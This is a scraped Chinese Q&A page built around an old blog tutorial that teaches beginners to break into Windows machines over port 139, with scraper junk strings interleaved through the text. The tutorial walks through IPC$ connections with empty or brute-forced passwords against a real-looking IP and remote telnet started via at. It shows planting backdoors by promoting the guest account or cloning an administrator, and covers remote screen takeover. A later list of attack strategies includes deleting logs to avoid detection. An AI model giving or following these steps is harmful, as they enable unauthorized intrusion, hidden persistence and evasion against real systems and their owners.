本文目录一览:
侵入网站该看什么书
黑客新手教程--入侵
2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴
我的日志
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
5e@pf9~)I0 第一部份:知识介绍爱好者博墅M t8pM+bnX,_
(1)什么是端口
i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
0qn$jxW8R'h0 (2)端口是唯一的吗?
d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]
(3)TCP139端口的作用
\+g6k@"]0 TCP139是用于网络共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用
st q'l(@SrC0b0 首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
P @7i~]4W0 点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件,输入c:\dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
C['_^}9U A^0 cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\d: 就到了D盘下了,而不用cd d:,这点要注意。爱好者博墅/@Kb/HL;t ?5Q
del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
;}D |0uU3w0 copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx
net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
s C+Ay5? Y.}y0 net use
'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?爱好者博墅/^)o!e]L6{2z
net view爱好者博墅/v-o?MN'I.H
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q
net share
*Y,\ IP"h.?;I8l~ H0net share 用于开放共享,输入net share QQ=c:\tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja
net user爱好者博墅"q"R7p Qy"EO
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X
┎———————————————————————————————————————————————————————┒
6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。 ┃
4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E
┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR
┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚
3\|;h aU,]0net start / net stop
iC!ok n0net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。爱好者博墅"`k,H5au'S;O;U
*at 命令,net time
"g|?\f;VJ0之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus
SMBCrack 针对特定主机,暴力猜解密码爱好者博墅 ^,f]cRs+n
DameWare Mini Remote Control 监控运程屏幕
~f9b fy#i"o0 CA.exe 克隆管理员账号
第二部份:入侵实例
,Kz/K ?#Hbw/k0今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。爱好者博墅"W e!Y8De
文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A
(2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?
(3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M
好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。
学入侵看什么书好
入门级别 黑客攻防
给个参考资料
黑客惯用的入侵策略(黑客入侵十三招)
1:瞒天过海——数据驱动攻击
当有些表面看来无害的特殊程序在被送出或复制到网络主计算机上并被执行发起攻击时,就会发生数据驱动攻击。例如,一种数据驱动的攻击可以造成一台主计算机修改与网络安全有关的文件,从而使黑客下一次更容易入侵该系统。
2:趁火打劫——系统文件非法利用
UNIX系统可执行文件的目录,如/bin/who可由所有的使用者进行读访问。有些使用者可以从可执行文件中得到其版本号,从而结合已公布的数据知道系统会具有什么样的漏洞,如通过Telnet指令操作就可以知道Sendmail的版本号。禁止对可执文件的访问虽不能防止黑客对它们的攻击,但至少可以使这种攻击变得更困难。还有一些弱点是由配置文件、访问控制文件和缺省初始化文件产生的。最出名的一个例子是:用来安装SunOS Version 4的软件,它创建了一个/rhosts文件,这个文件允许局域网(因特网)上的任何人,从任何地方取得对该主计算机的超级使用者特权。当然,最初这个文件的设置是为了“从网上方便地进行安装,而不需超级使用者的允许和检查”。
“智者千虑,必有一失”,操作系统设计的漏洞为黑客开启了后门,最近的针对WIN95/WIN NT的一系列具体攻击就是很好的实例。
3:无中生有——伪造信息攻击
通过送出伪造的路由信息,构造系统源主计算机和目标主计算机的虚假路径,从而使流向目标主计算机的数据包均经过攻击者的系统主计算机。这样就给人提供敏感的信息和有用的密码。
4:暗渡陈仓——针对信息协议弱点攻击
IP地址的源路径选项允许IP数据包自己选择一条通往系统目的主计算机的路径。设想攻击者试图与防火墙后面的一个不可到达主计算机A连接。他只需要在送出的请求报文中设置IP源路径选项,使报文有一个目的地址指向防火墙,而最终地址是主计算机A。当报文到达防火墙时被允许通过,因为它指向防火墙而不是主计算机A。防火墙的IP层处理该报文的源路径被改变,并送出到内部网上,报文就这样到达了不可到达的主计算机A。
5:笑里藏刀——远程操纵
缺省的登录界面(sh#ll scr-ipts)、配置和客户文件是另一个问题区域, 它们提供了一个简单的方法来配置一个程序的执行环境。这有时会引起远程操纵的攻击:在被攻击主计算机上启动一个可执行程序,该程序显示一个伪造的登录界面。当使用者在这个伪装的界面上输入登录信息(使用者名、密码等)后,该程序将使用者输入的信息传送到攻击者主计算机,然后关闭界面给出提示信息说“系统故障”,要求使用者重新登录。此后,才会出现真正的登录界面。在我们能够得到新一代更加完善的操作系统版本之前,类似的攻击仍会发生。防火墙的一个重要作用就是防止非法使用者登录到受保护网的主计算机上。例如可以在进行报文过滤时,禁止外部主计算机Telnet登录到内部主计算机上。
6:顺手牵羊——利用系统管理员失误攻击
网络安全的重要因素之一就是人!无数历史事实表明:“保垒最容易从内部攻破”。因而人为的失误,如WWW服务器系统的配置差错,普通使用者使用权限扩大,这样就给黑客造成了可趁之机。黑客常利用系统管理员的失误,收集攻击信息。如用finger、netstat、arp、w、who、ps、ls、mail、grep命令和SATAN黑客工具软件。
7:借尸还魂——重新送出(REP-LAY)攻击
收集特定的IP数据包,篡改其数据,然后再一一重新送出,欺骗接收的主计算机。
8:调虎离山,声东击西——对ICMP报文的攻击
尽管比较困难,黑客们有时也使用ICMP报文进行攻击。复位向消息可以改变路由列表,路由器可以根据这些消息建议主计算机走另一条更好的路径。攻击者可以有效地利用复位向消息把连接转向一个不可靠的主计算机或路径,或使所有报文通过一个不可靠主计算机来转发。对付这种威胁的方法是对所有ICMP复位向报文进行过滤,有的路由软件可对此进行配置。单纯地抛弃所有复位向报文是不可取的:主计算机和路由器常常会用到它们,如一个路由器发生故障时。
9:抛砖引玉——针对源路径选项的弱点攻击
强制报文通过一个特定的路径到达目的主计算机。这样的报文可以用来攻陷防火墙和欺骗主计算机。一个外部攻击者可以传送一个具有内部主计算机地址的源路径报文。服务器会相信这个报文并对攻击者发回答报文,因为这是IP的源路径选项要求的。
对付这种攻击最好的办法是配置好路由器,使它抛弃那些由外部网进来的却声称是内部主计算机的报文。
10:混水摸鱼——以太网广播攻击
将以太网接口置为乱模式(promiscuous),截获局部范围的所有数据包,为我所用。
11:远交近攻——“跳跃式”攻击
现在许多因特网上的站台使用UNIX操作系统。黑客们会设法先登录到一台UNIX的主计算机上,通过该操作系统的漏洞来取得系统特权,然后再以此为据点访问其余主计算机,这被称为“跳跃”(Island-hopping)。黑客们在达到目的主计算机之前往往会这样跳几次。例如一个在美国黑客在进入美联邦调查局的网络之前,可能会先登录到亚洲的一台主计算机上,再从那里登录到加拿大的一台主计算机,然后再跳到欧洲,最后从法国的一台主计算机向联邦调查局发起攻击。这样被攻击网络即使发现了黑客是从何处向自己发起了攻击,管理人员也很难顺藤摸瓜找回去,更何况黑客在取得某台主计算机的系统特权后,可以在退出时删掉系统日志,把“藤”割断。你只要能够登录到UNIX系统上,就能相对容易成为超级使用者,这使得它同时成为黑客和安全专家们的关注点。
12:偷梁换柱——窃取TCP协议连接
网络互连协议也存在许多易受攻击的地方。而且互连协议的最初产生本来就是为了更方便信息的交流,因此设计者对安全方面很少甚至不去考虑。针对安全协议的分析成为攻击的最历害一招。
在几乎所有由UNIX实现的协议族中,存在着一个久为人知的漏洞,这个漏沿使得窃取TCP连接成为可能。当TCP连接正在建立时,服务器用一个含有初始序号的答报文来确认使用者请求。这个序号无特殊要求,只要是唯一的就可以了。客户端收到回答后,再对其确认一次,连接便建立了。
TCP协议规范要求每秒更换序号25万次。但大多数的UNIX系统实际更换频率远小于此数量,而且下一个更换的数字往往是可以预知的。而黑客正是有这种可预知服务器初始序号的能力使得攻击可以完成。
唯一可以防治这种攻击的方法是使初始序号的产生更具有随机性。最安全的解决方法是用加密算法产生初始序号。额外的CPU运算负载对现在的硬件速度来说是可以忽略的。
13:反客为主——夺取系统控制权
在UNIX系统下,太多的文件是只能由超级使用者拥有,而很少是可以由某一类使用者所有,这使得管理员必须在root下进行各种操作,这种做法并不是很安全的。黑客攻击首要对象就是root,最常受到攻击的目标是超级使用者Password。严格来说,UNIX下的使用者密码是没有加密的,它只是作为DES算法加密一个常用字符串的密钥。现在出现了许多用来解密的软件工具,它们利用CPU的高速度来究尽式搜索密码。攻击一旦成功,黑客就会成为UNIX系统中的“皇帝”。因此,将系统中的权利进行“三权分立”,如果设定信件系统信件管理员管理,那么信件管理员可以在不具有超级使用者特权的情况下很好地管理信件系统,这会使系统安全很多。
此外,攻击者攻破系统后,常使用金蝉脱壳之计——删除系统运行日志,使自己不被系统管理员发现,便以后东山再起。故有“用兵之道,以计为首”之说,作为网络攻击者会竭尽一切可能的方法,使用各种计谋来攻击目标系统。这就是所谓的三十六计中的连环计。
学入侵首先学什么
L.wlNqxT.入侵法.DOS入侵法;黑基网上有教程.想学入侵的话.先学会扫描某端口漏洞;.掌握黑客基本用的命令.用命令获取对方lp地址;方法太多了.建议你去一些黑客网看下了;